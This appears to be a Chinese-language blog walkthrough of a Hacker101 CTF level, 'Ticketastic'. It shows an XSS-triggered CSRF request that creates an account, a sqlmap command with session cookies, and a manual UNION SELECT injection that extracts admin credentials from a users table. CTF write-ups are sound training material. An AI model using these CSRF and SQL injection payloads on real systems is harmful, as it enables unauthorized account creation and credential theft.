Pxiaoer Research
← Back to Blog hacker101-ctf

08.Ticketastic: Live Instance

从07的demo上看,这个环境有XSS,还有SQL注入。 现在是admin login密码错误,但是我们还有一个输入点,那就是提交票的标题和内容。

从07的demo上看,这个环境有XSS,还有SQL注入。 现在是admin login密码错误,但是我们还有一个输入点,那就是提交票的标题和内容。

那是否可以CSRF呢?我在XSS中创建一个用户,看看是否可以

创建用户

GET http://34.94.3.143/eb0fe4d167/newUser?username=root&password=root&password2=root

我们把它改成

这样admin点击之后就直接创建了一个用户

再换一个需要点击链接的,看看机器人是否会点击

root/123456 登录成功

我们拿到了一个FLAG

第二个FLAG应该就是那个SQL注入了,我们用sqlmap 来跑一下试试

sqlmap -u “http://34.94.3.143/44dbc733c3/ticket?id=1” —cookie=“session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YWD17g.9yvm5JT5avV0dUyDeSsKpZVBXs4; session_level7b=eyJ1c2VyIjoicm9vdCJ9.YWD5AA.KpsfO9YOdIzFJ9ud1Br6L6trEXA” -o —threads 10 -v 3 —technique=U —dbms=“mysql” —common-tables

也可以手工注入

http://34.94.3.143/44dbc733c3/ticket?id=10%20union%20select%20id,username,password%20from%20users%20where%20username=%27admin%27%20—